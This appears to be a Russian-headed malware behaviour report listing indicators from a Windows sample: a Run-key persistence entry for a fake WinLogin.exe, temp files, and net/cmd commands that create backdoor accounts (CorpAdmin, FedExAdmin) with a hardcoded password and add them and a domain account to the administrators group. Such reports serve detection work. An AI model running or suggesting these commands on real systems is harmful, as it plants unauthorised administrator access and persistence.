Техническая информация
- [<HKLM>\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run] 'CustomUser' = '<SYSTEM32>\WinLogin.exe'
- %TEMP%\autac4f.tmp
- %WINDIR%\syswow64\winlogin.exe
- %TEMP%\autac4f.tmp
- '%WINDIR%\syswow64\cmd.exe' /c net user FedExAdmin j@deRhino23
- '%WINDIR%\syswow64\cmd.exe' /c net user CorpAdmin j@deRhino23 /add
- '%WINDIR%\syswow64\cmd.exe' /c net user corp.ds.fedex.com\453248 /add
- '%WINDIR%\syswow64\cmd.exe' /c net localgroup administrators CorpAdmin /add
- '%WINDIR%\syswow64\cmd.exe' /c net localgroup administrators corp.ds.fedex.com\453248 /add
- '%WINDIR%\syswow64\net.exe' user CorpAdmin j@deRhino23 /add
- '%WINDIR%\syswow64\net.exe' user FedExAdmin j@deRhino23
- '%WINDIR%\syswow64\net.exe' user corp.ds.fedex.com\453248 /add
- '%WINDIR%\syswow64\net.exe' localgroup administrators corp.ds.fedex.com\453248 /add
- '%WINDIR%\syswow64\net.exe' localgroup administrators CorpAdmin /add
- '%WINDIR%\syswow64\net1.exe' user CorpAdmin j@deRhino23 /add
- '%WINDIR%\syswow64\net1.exe' user FedExAdmin j@deRhino23
- '%WINDIR%\syswow64\net1.exe' user corp.ds.fedex.com\453248 /add
- '%WINDIR%\syswow64\net1.exe' localgroup administrators corp.ds.fedex.com\453248 /add
- '%WINDIR%\syswow64\net1.exe' localgroup administrators CorpAdmin /add